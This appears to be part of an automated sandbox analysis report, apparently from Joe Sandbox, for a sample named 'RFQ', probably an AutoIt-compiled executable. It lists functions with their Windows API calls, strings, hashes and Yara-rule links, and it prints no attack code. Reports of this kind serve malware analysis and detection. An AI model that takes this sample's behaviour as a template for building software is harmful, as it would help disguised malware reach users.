                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __snwprintf
                                                                                                                                                    • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                                                    • API String ID: 2391506597-2584243854
                                                                                                                                                    • Opcode ID: 0124cef69014ff49ce6da118dccce09ed4f3354ea42184546e480d332635f952
                                                                                                                                                    • Instruction ID: d2d03b52bfbec188c299c0210e40fd5552050cb835c88d6fe621b962984322cc
                                                                                                                                                    • Opcode Fuzzy Hash: 0124cef69014ff49ce6da118dccce09ed4f3354ea42184546e480d332635f952
                                                                                                                                                    • Instruction Fuzzy Hash: 8A216F71740158FFDF11EFA4D886EAD77B4AF48740F004469F505AB142EB78EA45CBA1
                                                                                                                                                    Function 007993CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0079945C
                                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00799467
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID: Combobox
                                                                                                                                                    • API String ID: 3850602802-2096851135
                                                                                                                                                    • Opcode ID: 4da2d81214fbd0f1dc6e39c4aa94d82e5a31fb3f2b070066ddaeb73418d70722
                                                                                                                                                    • Instruction ID: 764ff6d704abe9883d51872958b195d9fa995cfc4dfba11fa01ebb6da0f2c2fa
                                                                                                                                                    • Opcode Fuzzy Hash: 4da2d81214fbd0f1dc6e39c4aa94d82e5a31fb3f2b070066ddaeb73418d70722
                                                                                                                                                    • Instruction Fuzzy Hash: 02119B71310548AFFF21DF58EC81EBB376EEB583A4F104129FA15972A0D679DC518760
                                                                                                                                                    Function 0079DA42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0074B34E: GetWindowLongW.USER32(?,000000EB), ref: 0074B35F
                                                                                                                                                    • GetActiveWindow.USER32 ref: 0079DA7B
                                                                                                                                                    • EnumChildWindows.USER32(?,0079D75F,00000000), ref: 0079DAF5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$ActiveChildEnumLongWindows
                                                                                                                                                    • String ID: T1x
                                                                                                                                                    • API String ID: 3814560230-209166786
                                                                                                                                                    • Opcode ID: 425ea60d178afa16f31262431848a760e97a29253f33b6644465409fd6c5ce07
                                                                                                                                                    • Instruction ID: b9ece02572fa2fd23843a5bc5e8091ae99ec51dc3b59dd19634a65ee53e6a3fc
                                                                                                                                                    • Opcode Fuzzy Hash: 425ea60d178afa16f31262431848a760e97a29253f33b6644465409fd6c5ce07
                                                                                                                                                    • Instruction Fuzzy Hash: 7B213975204205DFCB24DF68E850AA6B3E5EF59320F654619E96AC73E0DB38AC10CF64
                                                                                                                                                    Function 007998FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0074D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0074D1BA
                                                                                                                                                      • Part of subcall function 0074D17C: GetStockObject.GDI32(00000011), ref: 0074D1CE
                                                                                                                                                      • Part of subcall function 0074D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0074D1D8
                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00799968
                                                                                                                                                    • GetSysColor.USER32(00000012), ref: 00799982
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                    • String ID: static
                                                                                                                                                    • API String ID: 1983116058-2160076837
                                                                                                                                                    • Opcode ID: 2c52d72bb72adadd0c80a63dfe6130fe030dd81281af6eae00c236dc26738489
                                                                                                                                                    • Instruction ID: cd0c25ab79ab42043b6403b5517de51f0ef6ab7ab6e2dccd0d98532a3c7d8004
                                                                                                                                                    • Opcode Fuzzy Hash: 2c52d72bb72adadd0c80a63dfe6130fe030dd81281af6eae00c236dc26738489
                                                                                                                                                    • Instruction Fuzzy Hash: F8111472520209AFDF14DFB8D845AEA7BA8FB48354F01462CFA55E2250E739E850DB60
                                                                                                                                                    Function 00799617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 00799699
                                                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007996A8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LengthMessageSendTextWindow
                                                                                                                                                    • String ID: edit
                                                                                                                                                    • API String ID: 2978978980-2167791130
                                                                                                                                                    • Opcode ID: 920ab0446342091f2bf67967643c20738f657642a51545a14b571984b1011259
                                                                                                                                                    • Instruction ID: 3e00ea50bf2522735dd763a6be59bb5330fe51572d62c6949aed07a676d817d6
                                                                                                                                                    • Opcode Fuzzy Hash: 920ab0446342091f2bf67967643c20738f657642a51545a14b571984b1011259
                                                                                                                                                    • Instruction Fuzzy Hash: 40118C71500108ABFF209F68EC44EEB3B6AEB053B8F504328FA65931E0C73ADC509764
                                                                                                                                                    Function 00775262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 007752D5
                                                                                                                                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 007752F4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoItemMenu_memset
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 2223754486-4108050209
                                                                                                                                                    • Opcode ID: c36f0bf713006819fc769de2ef1fd8517de8659cef17b024344c9346d00a6aa3
                                                                                                                                                    • Instruction ID: fa86fd1a5ae02448cf527ed796caf190098ebdc584d357839f5b98604873e381
                                                                                                                                                    • Opcode Fuzzy Hash: c36f0bf713006819fc769de2ef1fd8517de8659cef17b024344c9346d00a6aa3
                                                                                                                                                    • Instruction Fuzzy Hash: 9311D072A01614EBDF20DB98DD04BA977B9AB067D4F048125E90DE72A0E3F8AD04C7A0
                                                                                                                                                    Function 00784D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00784DF5
                                                                                                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00784E1E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Internet$OpenOption
                                                                                                                                                    • String ID: <local>
                                                                                                                                                    • API String ID: 942729171-4266983199
                                                                                                                                                    • Opcode ID: 2561e58d1a3dc1b089a300bd45efb6bba7dce9f8c4520de491fa936a854a4d06
                                                                                                                                                    • Instruction ID: 186099a7c5e453b699d994e49742ecd9a6c83e3b3b32519bc7b229c76eb596a1
                                                                                                                                                    • Opcode Fuzzy Hash: 2561e58d1a3dc1b089a300bd45efb6bba7dce9f8c4520de491fa936a854a4d06
                                                                                                                                                    • Instruction Fuzzy Hash: 9C117070641222FBDB259F51CC89EFBFAA8FF16755F10822AF61596140E7B85940C7F0
                                                                                                                                                    Function 0078A82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0078A84E
                                                                                                                                                    • htons.WSOCK32(00000000,?,00000000), ref: 0078A88B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: htonsinet_addr
                                                                                                                                                    • String ID: 255.255.255.255
                                                                                                                                                    • API String ID: 3832099526-2422070025
                                                                                                                                                    • Opcode ID: c73edfe2a06ed201c93ec9365b5bdd20673a8e1f9706ec2804a1e55f0ba195fc
                                                                                                                                                    • Instruction ID: 29c6a029aad33a7c036446ef4e5021a37a658919a6c13a7a54b054fe49919152
                                                                                                                                                    • Opcode Fuzzy Hash: c73edfe2a06ed201c93ec9365b5bdd20673a8e1f9706ec2804a1e55f0ba195fc
                                                                                                                                                    • Instruction Fuzzy Hash: 4401F975240305BBDB22EF64C84AFADB364EF44310F108527F5169B2D1D779E801C766
                                                                                                                                                    Function 0076B781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0076B7EF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                    • API String ID: 3850602802-1403004172
                                                                                                                                                    • Opcode ID: 895eda124116d60ee8539d8de4ec1109093efdc6a0ecfd54579315460b9a6cb4
                                                                                                                                                    • Instruction ID: 2aa4a247b0811195d1eb5fb98f32f817193d2d30945b037cec26f818553bdc4e
                                                                                                                                                    • Opcode Fuzzy Hash: 895eda124116d60ee8539d8de4ec1109093efdc6a0ecfd54579315460b9a6cb4
                                                                                                                                                    • Instruction Fuzzy Hash: B201F1B1A41118EBDB05EBA4CC569FE73A9AF56350B000619F863A32C3EB7858188B90
                                                                                                                                                    Function 0076B67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 0076B6EB
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                    • API String ID: 3850602802-1403004172
                                                                                                                                                    • Opcode ID: ec41714eb50a9737db086b7bb630e6cbbfc3e357d875ff9cb0997a52e3e10ba5
                                                                                                                                                    • Instruction ID: 3f0df3134f45743105128c757516cc8bf8093a79b0a202cbd2562fb3c75cf574
                                                                                                                                                    • Opcode Fuzzy Hash: ec41714eb50a9737db086b7bb630e6cbbfc3e357d875ff9cb0997a52e3e10ba5
                                                                                                                                                    • Instruction Fuzzy Hash: 3C01A2B1A41008ABDB15EBA4C956FFE73AD9F0A344F140029B903B3193EB5C5E188BB5
                                                                                                                                                    Function 0076B700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 0076B76C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                    • API String ID: 3850602802-1403004172
                                                                                                                                                    • Opcode ID: 76a1b8a28ecb798f93899142b14681c7bdabba01d105c85caa1189bfe637752d
                                                                                                                                                    • Instruction ID: 7658efbe4cf3354764948dd919e6db2433c91380b0a8ea83e2888c5c47ba2f4f
                                                                                                                                                    • Opcode Fuzzy Hash: 76a1b8a28ecb798f93899142b14681c7bdabba01d105c85caa1189bfe637752d
                                                                                                                                                    • Instruction Fuzzy Hash: 8C01D6B1A41104EBDB11E7A4C916FFE73AC9B06344F10002ABC03B3193EB6C5E1987B5
                                                                                                                                                    Function 00734024 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadImageW.USER32(00730000,00000063,00000001,00000010,00000010,00000000), ref: 00734048
                                                                                                                                                    • EnumResourceNamesW.KERNEL32(00000000,0000000E,007767E9,00000063,00000000,75A90280,?,?,00733EE1,?,?,000000FF), ref: 007A41B3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnumImageLoadNamesResource
                                                                                                                                                    • String ID: >s
                                                                                                                                                    • API String ID: 1578290342-1828237159
                                                                                                                                                    • Opcode ID: ac095177c5c3c0b1face34668ca6d469879919bdc8c439296e88e9887362caaf
                                                                                                                                                    • Instruction ID: f295503b4fa49182d9138439c94581e610a92ac94e2714dbd735a0b8f969e07b
                                                                                                                                                    • Opcode Fuzzy Hash: ac095177c5c3c0b1face34668ca6d469879919bdc8c439296e88e9887362caaf
                                                                                                                                                    • Instruction Fuzzy Hash: DFF09671740314F7E6344B1AFC46FE23B99E745BB5F508506F224D61D0D2F99480CA98
                                                                                                                                                    Function 00777744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassName_wcscmp
                                                                                                                                                    • String ID: #32770
                                                                                                                                                    • API String ID: 2292705959-463685578
                                                                                                                                                    • Opcode ID: 352d2c073c40139d63e6e965740a7801a5998123b3eb20938f86fa1ef1a7339e
                                                                                                                                                    • Instruction ID: 8d7d334f55a8adb10477f680d834cb45cf80055295b0f4e76050f53639c63ea6
                                                                                                                                                    • Opcode Fuzzy Hash: 352d2c073c40139d63e6e965740a7801a5998123b3eb20938f86fa1ef1a7339e
                                                                                                                                                    • Instruction Fuzzy Hash: CCE0227360022467DB20EAA59C09FC7FBACAB507A4F00412AB904D7041E678AA00C7D4
                                                                                                                                                    Function 0076A631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0076A63F
                                                                                                                                                      • Part of subcall function 007513F1: _doexit.LIBCMT ref: 007513FB
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message_doexit
                                                                                                                                                    • String ID: AutoIt$Error allocating memory.
                                                                                                                                                    • API String ID: 1993061046-4017498283
                                                                                                                                                    • Opcode ID: 2a06a9fc9ba4cb3380cb394c2c44028d12356c16f7cf1e3b5ae5b60a8af7eef2
                                                                                                                                                    • Instruction ID: b7f7500ea484f9571b73d434f9d1355ebf7c601b5c6ee9f40f8da94371c939f2
                                                                                                                                                    • Opcode Fuzzy Hash: 2a06a9fc9ba4cb3380cb394c2c44028d12356c16f7cf1e3b5ae5b60a8af7eef2
                                                                                                                                                    • Instruction Fuzzy Hash: B7D05B713C531873D22436996C1FFC9764C8B19B96F044025FF08A55C359DEDD5141D9
                                                                                                                                                    Function 007AAE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(?), ref: 007AACC0
                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 007AAEBD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DirectoryFreeLibrarySystem
                                                                                                                                                    • String ID: WIN_XPe
                                                                                                                                                    • API String ID: 510247158-3257408948
                                                                                                                                                    • Opcode ID: f9974859497a1495337d95ec24307762b887e94eb084b291d7efb27be631341d
                                                                                                                                                    • Instruction ID: 82b6f1b505d034b76e6669b781e4b77ecb832ae58ec0b7950d03e9056d27cd71
                                                                                                                                                    • Opcode Fuzzy Hash: f9974859497a1495337d95ec24307762b887e94eb084b291d7efb27be631341d
                                                                                                                                                    • Instruction Fuzzy Hash: 2FE03070C00149EFDB15DFA4D944AECF7B8AB89300F109181E042B2160DB385A44DF36
                                                                                                                                                    Function 007986CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
